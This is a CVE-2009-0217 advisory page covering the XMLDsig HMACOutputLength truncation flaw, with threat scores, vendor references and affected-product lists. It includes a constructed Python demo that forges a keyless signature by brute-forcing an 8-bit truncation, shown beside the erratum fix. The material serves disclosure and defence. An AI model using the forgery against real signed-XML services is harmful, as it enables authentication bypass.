Vulnerability Details : CVE-2009-0217
The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits.
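The weak point is where HMACOutputLength lives: inside SignedInfo, the very element the HMAC is meant to protect, so whoever can edit the document also decides how many bits of the MAC the verifier compares. The constructed Python below (added here; not code from any product listed above) builds a minimal HMAC-SHA1 ds:Signature with the standard library, verifies it once the pre-fix way and once with the minimum-length rule from the W3C erratum e03 linked in the references (HMACOutputLength at least 80 bits and at least half the digest length, never more than the digest), and forges a signature for a tampered body by brute-forcing an 8-bit truncation. Assumptions: the demo key, body strings and XML layout are made up; ElementTree re-serialisation stands in for canonicalization (C14N); `verify` doubles as the target server that acts as the attacker's oracle.

```python
"""Constructed demo of CVE-2009-0217: an XMLDSig verifier that honours any
HMACOutputLength, the forgery that abuses it, and the minimum-length check
that closes it. Example code, not from any product named on this page."""
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"
HMAC_SHA1 = "http://www.w3.org/2000/09/xmldsig#hmac-sha1"
ET.register_namespace("ds", DS)

KEY = b"demo-shared-secret"  # constructed; the secret the issuer and verifier share


def b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def canon(elem: ET.Element) -> bytes:
    """Stand-in for the CanonicalizationMethod step (C14N): a deterministic
    re-serialisation, which is enough for a document nobody reformats."""
    return ET.tostring(elem, encoding="utf-8")


def truncate_bits(data: bytes, nbits: int) -> bytes:
    """Leading nbits bits of data: the part HMACOutputLength tells the verifier to compare."""
    nbytes = (nbits + 7) // 8
    out = bytearray(data[:nbytes])
    if nbits % 8 and out:
        out[-1] &= (0xFF << (8 - nbits % 8)) & 0xFF
    return bytes(out)


def build(body: str, key: bytes, output_length=None, signature_value=None) -> str:
    """Issuer side: wrap body in a minimal ds:Signature (HMAC-SHA1 over SignedInfo).
    An attacker calls it with a chosen output_length and an arbitrary signature_value."""
    hol = (f"<ds:HMACOutputLength>{output_length}</ds:HMACOutputLength>"
           if output_length is not None else "")
    digest = b64(hashlib.sha1(body.encode()).digest())
    root = ET.fromstring(
        f'<Signed xmlns:ds="{DS}"><Body>{body}</Body><ds:Signature><ds:SignedInfo>'
        f'<ds:SignatureMethod Algorithm="{HMAC_SHA1}">{hol}</ds:SignatureMethod>'
        f'<ds:Reference URI="#body"><ds:DigestValue>{digest}</ds:DigestValue></ds:Reference>'
        f'</ds:SignedInfo><ds:SignatureValue/></ds:Signature></Signed>')
    si = root.find(f"{{{DS}}}Signature/{{{DS}}}SignedInfo")
    if signature_value is None:
        signature_value = hmac.new(key, canon(si), hashlib.sha1).digest()
    root.find(f"{{{DS}}}Signature/{{{DS}}}SignatureValue").text = b64(signature_value)
    return ET.tostring(root, encoding="unicode")


def verify(doc: str, key: bytes, hardened: bool) -> bool:
    """Verifier side. hardened=False is the pre-fix behaviour: whatever
    HMACOutputLength the document declares is honoured, even 0 or 8 bits."""
    root = ET.fromstring(doc)
    body = root.findtext("Body") or ""
    sig = root.find(f"{{{DS}}}Signature")
    si = sig.find(f"{{{DS}}}SignedInfo")
    # The Reference digest is unkeyed, so anyone can recompute it for a tampered
    # body; only the keyed MAC over SignedInfo can actually prove authenticity.
    expected_digest = b64(hashlib.sha1(body.encode()).digest())
    if si.findtext(f"{{{DS}}}Reference/{{{DS}}}DigestValue") != expected_digest:
        return False
    mac = hmac.new(key, canon(si), hashlib.sha1).digest()
    full_bits = len(mac) * 8
    hol = si.findtext(f"{{{DS}}}SignatureMethod/{{{DS}}}HMACOutputLength")
    nbits = full_bits if hol is None else int(hol.strip())
    # Erratum e03 rule: never compare fewer than 80 bits or fewer than half the
    # digest, and never more than the digest itself. Checked before any comparison.
    if hardened and not (max(80, full_bits // 2) <= nbits <= full_bits):
        return False
    given = base64.b64decode(sig.findtext(f"{{{DS}}}SignatureValue") or "")
    return hmac.compare_digest(truncate_bits(mac, nbits), truncate_bits(given, nbits))


def forge(body: str, bits: int = 8, hardened: bool = False):
    """Attacker side, no key: declare a tiny HMACOutputLength and brute-force the
    few bits the verifier will compare. verify() plays the target server here.
    Returns (forged_doc, attempts) on success, None if the verifier holds."""
    nbytes = (bits + 7) // 8
    for candidate in range(1 << bits):
        guess = (candidate << (8 * nbytes - bits)).to_bytes(nbytes, "big")
        doc = build(body, b"", output_length=bits, signature_value=guess)
        if verify(doc, KEY, hardened=hardened):
            return doc, candidate + 1
    return None


if __name__ == "__main__":
    legit = build("subject=alice;role=user", KEY)
    print("legitimate signature verifies:", verify(legit, KEY, hardened=True))
    hit = forge("subject=alice;role=admin", bits=8)
    print("pre-fix verifier accepted a forgery after", hit[1], "attempts")
    still = forge("subject=alice;role=admin", bits=8, hardened=True)
    print("hardened verifier accepts forgery:", still is not None)
```

With `bits=8` the forgery needs at most 256 attempts against the pre-fix verifier; with `bits=0` it needs one, because two empty strings always compare equal. The hardened path rejects the declared length before it touches the MAC, which is the shape of the vendor fixes listed below; an implementation that never supported truncation can go further and reject any HMACOutputLength element outright.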
Threat overview for CVE-2009-0217 (SecurityScorecard scanner data)
- Top open port discovered on systems with this issue: 9080 (the default WebSphere Application Server HTTP transport port)
- IPs affected by CVE-2009-0217: 1,613
- Threat actors abusing this issue: Yes
Exploit prediction scoring system (EPSS) score for CVE-2009-0217
Probability of exploitation activity in the next 30 days: 97.28%
Percentile (proportion of all scored vulnerabilities at or below this score): ~100%
CVSS scores for CVE-2009-0217
Base Score | Base Severity | CVSS Vector (v2) | Exploitability Score | Impact Score | Score Source
---|---|---|---|---|---
5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:P/A:N | 10.0 | 2.9 | NIST
References for CVE-2009-0217
- http://www.securitytracker.com/id?1022661
- http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00005.html - [security-announce] SUSE Security Announcement: OpenOffice.org (SUSE-SA:
- http://www.securityfocus.com/bid/35671 [Patch]
- http://www.vupen.com/english/advisories/2009/1908 [Patch; Vendor Advisory]
- https://bugzilla.redhat.com/show_bug.cgi?id=511915 - 511915 – (CVE-2009-0217) CVE-2009-0217 xmlsec1, mono, xml-security-c, xml-security-1.3.0-1jpp.ep1.*: XMLDsig HMAC-based signatures spoofing and authentication bypass
- https://issues.apache.org/bugzilla/show_bug.cgi?id=47527 - 47527 – XML signature HMAC truncation authentication bypass
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7158
- http://www.vupen.com/english/advisories/2010/0635
- http://git.gnome.org/cgit/xmlsec/commit/?id=34b349675af9f72eb822837a8772cc1ead7115c7
- http://www.securitytracker.com/id?1022567
- http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.html
- http://marc.info/?l=bugtraq&m=125787273209737&w=2 - [security bulletin] HPSBUX02476 SSRT090250 rev.1 - HP-UX Running Java, Remote Increase in Privilege
- http://blogs.sun.com/security/entry/cert_vulnerability_note_vu_466161
- http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023723&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere [Patch; Vendor Advisory]
- http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg21384925 [Patch; Vendor Advisory]
- https://rhn.redhat.com/errata/RHSA-2009-1650.html
- https://rhn.redhat.com/errata/RHSA-2009-1637.html
- http://www.kb.cert.org/vuls/id/466161 [US Government Resource]
- http://lists.apple.com/archives/security-announce/2009/Sep/msg00000.html
- http://sunsolve.sun.com/search/document.do?assetkey=1-21-125136-16-1
- https://rhn.redhat.com/errata/RHSA-2009-1649.html - RHSA-2009:1649 - Security Advisory
- http://www.vupen.com/english/advisories/2009/2543
- http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html - Oracle Critical Patch Update - October 2010
- http://www.mandriva.com/security/advisories?name=MDVSA-2009:209
- http://www.vupen.com/english/advisories/2010/0366
- http://www.vupen.com/english/advisories/2009/1909 [Patch; Vendor Advisory]
- http://www.us-cert.gov/cas/techalerts/TA10-159B.html - Microsoft Updates for Multiple Vulnerabilities (CISA) [US Government Resource]
- http://svn.apache.org/viewvc?revision=794013&view=revision
- https://usn.ubuntu.com/826-1/
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10186
- http://www.mono-project.com/Vulnerabilities - Vulnerabilities (Mono) [Vendor Advisory]
- http://www.kb.cert.org/vuls/id/MAPG-7TSKXQ
- http://www.securitytracker.com/id?1022561
- http://www.vupen.com/english/advisories/2009/3122
- http://www.kb.cert.org/vuls/id/WDON-7TY529
- http://www.us-cert.gov/cas/techalerts/TA09-294A.html - Oracle Updates for Multiple Vulnerabilities (CISA) [US Government Resource]
- http://www.aleksey.com/xmlsec/
- http://www.redhat.com/support/errata/RHSA-2009-1694.html
- http://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html
- http://www.openoffice.org/security/cves/CVE-2009-0217.html
- http://www.vupen.com/english/advisories/2009/1911 [Patch; Vendor Advisory]
- https://issues.apache.org/bugzilla/show_bug.cgi?id=47526 - 47526 – XML signature HMAC truncation authentication bypass
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8717
- https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00325.html - [SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-20.b16.fc10
- http://www.w3.org/QA/2009/07/hmac_truncation_in_xml_signatu.html [Vendor Advisory]
- http://www.ubuntu.com/usn/USN-903-1 - USN-903-1: OpenOffice.org vulnerabilities
- http://www.vupen.com/english/advisories/2009/1900 [Patch; Vendor Advisory]
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-269208-1
- https://rhn.redhat.com/errata/RHSA-2009-1201.html - RHSA-2009:1201 - Security Advisory
- https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00505.html - [SECURITY] Fedora 11 Update: xmlsec1-1.2.12-1.fc11
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-041 - Microsoft Security Bulletin MS10-041 - Important
- http://www.w3.org/2008/06/xmldsigcore-errata.html#e03 [Vendor Advisory]
- http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023545&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere [Patch; Vendor Advisory]
- http://git.gnome.org/cgit/xmlsec/patch/?id=34b349675af9f72eb822837a8772cc1ead7115c7
- https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00310.html - [SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-27.b16.fc11
- https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00494.html - [SECURITY] Fedora 10 Update: xmlsec1-1.2.12-1.fc10
- http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00002.html - [security-announce] SUSE Security Announcement: IBM Java 6 (SUSE-SA:2009:053)
- http://www.debian.org/security/2010/dsa-1995 - DSA-1995-1 openoffice.org
- https://rhn.redhat.com/errata/RHSA-2009-1200.html - RHSA-2009:1200 - Security Advisory
- https://rhn.redhat.com/errata/RHSA-2009-1636.html
- http://sunsolve.sun.com/search/document.do?assetkey=1-77-1020710.1-1
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-263429-1
- https://rhn.redhat.com/errata/RHSA-2009-1428.html - RHSA-2009:1428 - Security Advisory
- http://www.gentoo.org/security/en/glsa/glsa-201408-19.xml - OpenOffice, LibreOffice: Multiple vulnerabilities (GLSA 201408-19)
Products affected by CVE-2009-0217
- cpe:2.3:a:ibm:websphere_application_server:6.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.13:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.19:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.7:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.9:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.22:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.23:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2:*:fp17:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.24:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.25:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.12:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.13:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.6:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.10:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.14:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.8:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.16:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.18:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.15:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.11:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.9:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.7:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.3:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.32:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.17:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.5:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.30:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.31:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.22:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.28:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.29:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.20:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.21:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.1.13:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.19:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.10:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.12:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.21:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:7.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.14:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.16:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.33:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.1.0.23:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.18:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:websphere_application_server:6.0.2.20:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:application_server:10.1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:application_server:10.1.3.4:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:application_server:10.1.4.3im:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:10.0:mp1:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:9.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:9.1:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:9.2:mp3:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:8.1:sp6:*:*:*:*:*:*
- cpe:2.3:a:oracle:bea_product_suite:10.3:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:8.1:sp6:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:9.0:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:9.1:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:9.2:mp3:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:10.0:mp1:*:*:*:*:*:*
- cpe:2.3:a:oracle:weblogic_server_component:10.3:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.5:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.6:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.9:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:1.2.4:*:*:*:*:*:*:*
- cpe:2.3:a:mono_project:mono:2.0:*:*:*:*:*:*:*